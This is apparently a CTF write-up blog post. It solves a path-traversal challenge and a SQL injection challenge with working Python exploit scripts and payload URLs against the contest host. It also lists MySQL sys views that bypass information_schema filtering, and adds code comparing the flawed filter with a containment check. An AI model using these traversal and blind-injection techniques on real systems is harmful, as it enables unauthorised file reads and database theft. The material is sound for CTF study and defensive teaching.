Author: 颖奇L'Amore

Blog: www.gem-love.com

Misc-Depth is a challenge I wrote. You have to recurse until a RecursionError is raised, but the recursion limit is a random number, so the task is to analyse the algorithm first, then construct the exception, then find a way to cope with the randomised recursion limit. The full source is provided, so try it yourselves.


Ezinclude

A silly challenge. gqy.jpg and /gqy.jpg produce the same response, so a directory must be prepended to the file name before it is opened; with a fixed prefix in front of the name, wrappers (php://, data://, etc.) are out of the question. There is also a WAF, and had it rejected ../ anywhere in the name, this include would have been practically traversal-proof. It turned out that if the f parameter starts with a directory component and only then traverses, the WAF is bypassed (which makes for a rather boring challenge).

exp:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import base64 as b
import time as t
from urllib.parse import quote_plus as urlen

# t must be within 10 s of the server clock; f is the base64 of the file name (see the source below)
HOST = "http://183.129.189.60:10009/image.php?t={}&f=".format(int(t.time()))
# a leading directory component defeats the prefix-only WAF; the ../ then climb out of /var/www/html/img/
file = 'y1ng/../../../../../../../flag'
file = b.b64encode(file.encode("utf-8")).decode("utf-8")
url = HOST + urlen(file)   # quote_plus so '+', '/' and '=' in the base64 survive the query string
print(req.get(url).text)

While we are at it, read the source. Who writes a WAF like this = =

<?php

    if(!isset($_GET['t']) || !isset($_GET['f'])){
        echo "you miss some parameters";
        exit();
    }
    
    $timestamp = time();

    // t has to be within 10 seconds of the server clock; that is all it checks
    if(abs($_GET['t'] - $timestamp) > 10){
        echo "what's your time?";
        exit();
    }

    $file = base64_decode($_GET['f']);
    
    // the "WAF": only the first few bytes of the decoded name are inspected,
    // so "y1ng/../../../flag" passes while "../flag" is blocked
    if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
        echo 'You are not allowed to do that.';
    }
    else{
        // fixed prefix, so no wrappers; but '..' inside the name still walks out of the directory
        echo file_get_contents('/var/www/html/img/'.$file);
    }

?>
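As an added example (my code, not part of the original writeup or the challenge), the following Python transcribes the five prefix checks from the PHP above and puts them next to the check a hardened version would perform: canonicalise the full path first and then require that it still lies under the image directory. IMG_DIR mirrors the prefix hard-coded in image.php; the file names fed in are constructed, the third one being the payload from the exploit script.

```python
import posixpath

IMG_DIR = "/var/www/html/img/"   # the prefix hard-coded in image.php


def prefix_filter_allows(name: str) -> bool:
    """The challenge's filter, transcribed from the PHP: it only looks at how the name begins."""
    for banned in ("/../", "../", "./", "/.", "//"):
        if name.startswith(banned):
            return False
    return True


def resolved_path(name: str) -> str:
    """Where file_get_contents(IMG_DIR . $file) really ends up once '..' and '//' collapse."""
    return posixpath.normpath(IMG_DIR + name)


def containment_check_allows(name: str) -> bool:
    """The check the filter should have done: canonicalise, then test containment.
    normpath is purely lexical; on a live system use os.path.realpath so symlinks resolve too."""
    base = posixpath.normpath(IMG_DIR)
    resolved = resolved_path(name)
    return resolved == base or resolved.startswith(base + "/")


def compare(names):
    """Return {name: (prefix filter verdict, containment verdict, resolved path)}."""
    return {n: (prefix_filter_allows(n), containment_check_allows(n), resolved_path(n))
            for n in names}


if __name__ == "__main__":
    # constructed sample inputs; "/gqy.jpg" shows why it behaves exactly like "gqy.jpg"
    samples = ["gqy.jpg", "/gqy.jpg", "../flag", "y1ng/../../../../../../../flag"]
    for name, (waf, safe, path) in compare(samples).items():
        print(f"{name!r:40} waf={'pass' if waf else 'block':5} "
              f"containment={'pass' if safe else 'block':5} -> {path}")
```

The prefix filter and the containment check agree on the harmless and the obviously bad names; they disagree only on the exploit payload, which the filter lets through because its first component is a plain directory name, while the resolved path /flag is nowhere near /var/www/html/img/.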

SQLi

Its regex filters several of the keywords that time-based SQLi needs, so I assumed a Cartesian-product delay would be required; then it turned out that plain boolean-based blind injection works.

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import time as t
import string

# MySQL's default collations compare case-insensitively, so lowercase matches are enough
alphabet = string.ascii_letters + string.digits
res = ''

# database name: sqlidb, obtained via an injection after LIMIT
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

# table name: flllaaaggg (information_schema is filtered, sys.x$schema_flattened_keys is not)
payload = '''SELECT group_concat(table_name) FROM sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

for i in range(1, 100):
    for char in alphabet:
        # id=1'=(cond)# parses as (id='1')=(cond): the admin666 row comes back only when cond is true;
        # /**/ stands in for the spaces in the payload
        host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(
            payload=payload.replace(' ', '/**/'), i=i, char=char)

        r = req.get(host)
        if 'admin666' in r.text:
            res += char
            print("found it: " + res)
            break
        t.sleep(0.2)
    else:
        break   # no character matched at this position: end of the string

Column-less injection. My first idea was a column-less blind injection, but the flllaaaggg table has id as its first column and flag as its second, so a comparison such as (select 'y1ng','y1ng')>(select * from flllaaaggg) is decided by the id column before the flag column is ever looked at, and that blind approach fails as written. (It can in fact be done, because row comparison is lexicographic: pin the first element to the known id and the second column decides the outcome. Once I noticed the query result was echoed back I did not try further.) Since the challenge echoes results, a UNION query reads the table directly:

http://183.129.189.60:10004/?id=100%27/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23

By the way, since UNION works, the table name can also be read directly rather than blindly:

http://183.129.189.60:10004/?id=100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23
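To make both blind approaches in this section concrete, here is an added example (my code, not the writeup's) that models the injectable query against an in-memory SQLite database. The tables are constructed: a users table holding the admin666 marker and a flllaaaggg(id, flag) table with a made-up flag; the shape of the vulnerable query is an assumption. The id='1'=(cond) trick is the same one the script above uses, with MySQL's # line comment replaced by -- for SQLite. The block implements the per-character substr loop from the script, and the column-less extraction by row comparison with the first element pinned to the known id, which is what the (select 'y1ng','y1ng')>(select * from flllaaaggg) form lacks. The sys schema views are MySQL-only and are not modelled.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the challenge database (the real target is MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT);
        INSERT INTO users VALUES (1, 'admin666');
        CREATE TABLE flllaaaggg (id INTEGER, flag TEXT);
        INSERT INTO flllaaaggg VALUES (1, 'flag{constructed_sample}');
    """)
    return db


def vulnerable_lookup(db, user_id):
    """Assumed shape of the injectable query: the id is pasted straight into the SQL."""
    sql = f"SELECT username FROM users WHERE id='{user_id}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def oracle(db, condition_sql):
    """id=1'=(cond)--  parses as (id='1')=(cond): admin666 is echoed only when cond is true.
    MySQL accepts # as the line comment here; SQLite needs --."""
    return vulnerable_lookup(db, f"1'=({condition_sql})--") == "admin666"


# SQLite compares strings bytewise; MySQL's default collations are case-insensitive,
# which is why the writeup's script gets away with trying one case only.
ALPHABET = string.ascii_letters + string.digits + "_{}"


def blind_extract(db, expr_sql, alphabet=ALPHABET, max_len=64):
    """Boolean blind extraction, character by character, as in the script above.
    Stops at the first position where no character matches (end of the value)."""
    result = ""
    for i in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(db, f"substr(({expr_sql}),{i},1)='{ch}'"):
                result += ch
                break
        else:
            break
    return result


def columnless_extract(db, known_id, table, alphabet=ALPHABET, max_len=64):
    """Extract the second column of a one-row table without naming any column.
    Row comparison is lexicographic: with the first element pinned to the known id the
    second column decides. (known_id, guess) <= row holds exactly while guess is <= the
    real value, so the largest character that still passes is the next character.
    Needs row-value support (MySQL; SQLite >= 3.15, an assumption about the runtime)."""
    prefix = ""
    for _ in range(max_len):
        best = None
        for ch in sorted(alphabet):          # bytewise order, the order the comparison uses
            if oracle(db, f"({known_id},'{prefix}{ch}') <= (SELECT * FROM {table})"):
                best = ch
        if best is None:                     # prefix equals the value: every extension is greater
            break
        prefix += best
    return prefix


if __name__ == "__main__":
    db = make_db()
    print("substr loop: ", blind_extract(db, "SELECT flag FROM flllaaaggg"))
    print("column-less: ", columnless_extract(db, 1, "flllaaaggg"))
```

The column-less routine is the reason the pinned form works where the writeup's first attempt did not: with ('y1ng','y1ng') on the left the first elements already differ and the flag is never compared, whereas with (1, guess) the first elements are equal and the flag column alone decides the result.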

Original article by 颖奇L'Amore. When reposting, please credit the author and link to the article.

Article link: https://www.gem-love.com/ctf/2514.html


Category: CTF

颖奇L'Amore

Most of the time also called Y1ng. Cisco Certified Internetwork Expert - Routing and Switching. CTF player for team r3kapig. Focus on Web Security. Islamic Scholar. Be good at sleeping and fishing in troubled waters.

2 comments

th31nk · 25 July 2020 18:34

How did you find the database that can be used to bypass information_schema? QWQ
The ones I had seen in articles have basically all been banned QWQ
https://www.anquanke.com/post/id/193512

    颖奇L'Amore · 25 July 2020 18:50

    host_summary -> host, total_connections: IPs that have connected historically and the number of connections from each
    innodb_buffer_stats_by_schema -> object_schema: database name
    innodb_buffer_stats_by_table -> object_schema, object_name: database name, table name (can be filtered on)
    io_global_by_file_by_bytes -> file: path contains the database name
    io_global_by_file_by_latency -> file: path contains the database name
    processlist -> current_statement, last_statement: statement the database is currently executing, previous statement of that handle
    schema_auto_increment_columns -> table_schema, table_name, column_name: database name, table name, column name
    schema_index_statistics -> table_schema, table_name: database name, table name
    schema_object_overview -> db: database name
    schema_table_statistics -> table_schema, table_name: database name, table name
    schema_table_statistics_with_buffer -> table_schema, table_name: database name, table name
    schema_tables_with_full_table_scans -> object_schema, object_name: database name, table name (accessed via full table scan)
    session -> current_statement, last_statement: statement the database is currently executing, previous statement of that handle
    statement_analysis -> query, db: queries the database executed recently, database each query accessed
    statements_with_* -> query, db: recently executed queries in particular categories, database each query accessed
    version -> mysql_version: MySQL version information
    x$innodb_buffer_stats_by_schema: same as innodb_buffer_stats_by_schema
    x$innodb_buffer_stats_by_table: same as innodb_buffer_stats_by_table
    x$io_global_by_file_by_bytes: same as io_global_by_file_by_bytes
    x$schema_flattened_keys -> table_schema, table_name, index_columns: database name, table name, key name
    x$ps_schema_table_statistics_io -> table_schema, table_name, count_read: database name, table name, number of reads of the table
